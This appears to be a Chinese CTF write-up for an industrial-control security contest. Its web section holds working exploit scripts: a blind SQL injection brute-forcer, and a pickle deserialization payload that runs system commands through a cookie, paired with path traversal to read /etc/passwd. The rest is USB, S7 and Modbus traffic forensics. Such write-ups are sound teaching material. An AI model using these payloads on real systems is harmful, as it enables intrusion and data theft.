除了分数机制有点怪,题目整体还挺好的。
WEB
ez-sql
原题:InCTF 2021 Web 部分题解 · 语雀 (yuque.com)
import requests
url = 'http://116.62.239.41:4323/?sql1=%2561%2527%2561&sql2='
s = '}{zaqwsxcderfvbgtyhnmjuiklop0123456789.'
def strtohex(s):
ss = "0x"
for i in s:
ss += str(hex(ord(i))).replace("0x",'')
# print ss
return ss
flag = '53a2d36d72760586dfc400e54b54'
flag=''
for j in range(1,100):
for i in s:
if j >= 1 and j <=6:
payload = strtohex(flag + i + "%")
else:
payload = strtohex("%" + flag[-6:] + i + "%")
# payload = strtohex(flag + i + "%")
sql = f'password,username from user where password like {payload} union select 1'
res = requests.get(url+sql).text
# print(res.text)
if res == 'nop':
flag += i
print(flag)
break
if i == ".":
print(flag)
exit(0)ez-web
?pic=/etc/passwd,存在目录穿越,会返回一段图片base64,解密是源文件,
经典/app/app.py,访问获得源码
简单审计,考点是pickle反序列化,
从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 (zhihu.com)
结合命令执行漏洞和任意文件直接拿下
import requests
import pickle
import base64
#e = 'ls / -a'
e = 'cat /.ffffffffllllllllllllaaaaag'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://116.62.239.41:4322/?pic=/tmp/1.txt",
cookies=dict(
user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
if "base64" in l:
l = l.split("\"")[1].split(",")[1]
print(base64.b64decode(l).decode())
拿下
![图片[1]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-15.png)
MISC
签到题
下载,两个txt,cipher和flag,flag.txt0宽隐写,解密后获得
![图片[2]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-16.png)
myself指flag.txt,md5然后rabbit解密即可
![图片[3]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-17-1024x144.png)
Baby-Usb
没啥好说的。。。
FzWjScJ/knm: 鼠标键盘流量包取证 (github.com)
工具直接提流量,然后获得结果
congratulationsonfindingmebutiwillnottellyouwherethepasswordofworddocumentisgoandfinditagain
但是没啥用,可能存在删除之类的操作,这里写了个脚本,直接看完成的
#!/usr/bin/env python
#coding:utf-8
#coding:utf-8
import sys
import os
import re
DataFileName = "usb.dat"
presses = []
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}
def main():
# get argv
pcapFilePath = sys.argv[1]
# get data of pcap
os.system("tshark -r %s -T fields -e usb.capdata > %s" % (pcapFilePath, DataFileName))
# read data
with open(DataFileName, "r") as f:
for line in f:
presses.append(line[0:-1])
# handle
result = ""
for press in presses:
print press
press=press.replace(":","",-1)
print "press[0:2] "+press[0:2]
try:
b="0x"+str(press[0:2])
print b
a=int(b,16)
if press[0:2] == "00":
print press[4:6]
if press[4:6]!= "00" and normalKeys.get(press[4:6]):
result += normalKeys[press[4:6]]
elif a & 2 or a & 32: # shift key is pressed.
if press[4:6] != "00" and normalKeys.get(press[4:6]):
result += shiftKeys[press[4:6]]
else:
print("[-] Unknow Key : %s" % (press[4:6]))
except:
print("1")
print("[+] Found : %s" % (result))
# clean the temp data
os.system("rm ./%s" % (DataFileName))
if __name__ == "__main__":
main()![图片[4]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-18.png)
把被删的字符连起来,获得:
the key is qazwsxedcrfv
解密word,获得flag
协议解析
藏在s7里的秘密
wireshark直接过滤s7,发现该数据包开始存在PNG头
![图片[5]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-19-1024x535.png)
将后续几个流量包的内容拼接后存为png
![图片[6]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-20.png)
嗯,png高度,改下就出了
![图片[7]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-21.png)
老练的黑客
题目附件好像都是一个,,,
2021CTF工业信息安全技能大赛-损坏的风机_夜白君的博客-CSDN博客
啊,反正都差不多,就过滤modbus
然后题目说5000,5000的16进制是1388,找比1388大的data就可以了
![图片[8]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-22.png)
盯住写流量
![图片[9]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-23.png)
找到第一个data,第二个题目说是读取错误,那就是write后面的read
![图片[10]-首届网刃杯工控ctf WriteUp-魔法少女雪殇](http://www.snowywar.top/wp-content/uploads/2021/09/image-24.png)
flag就是flag{22b81194}
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
- 最新
- 最热
只看作者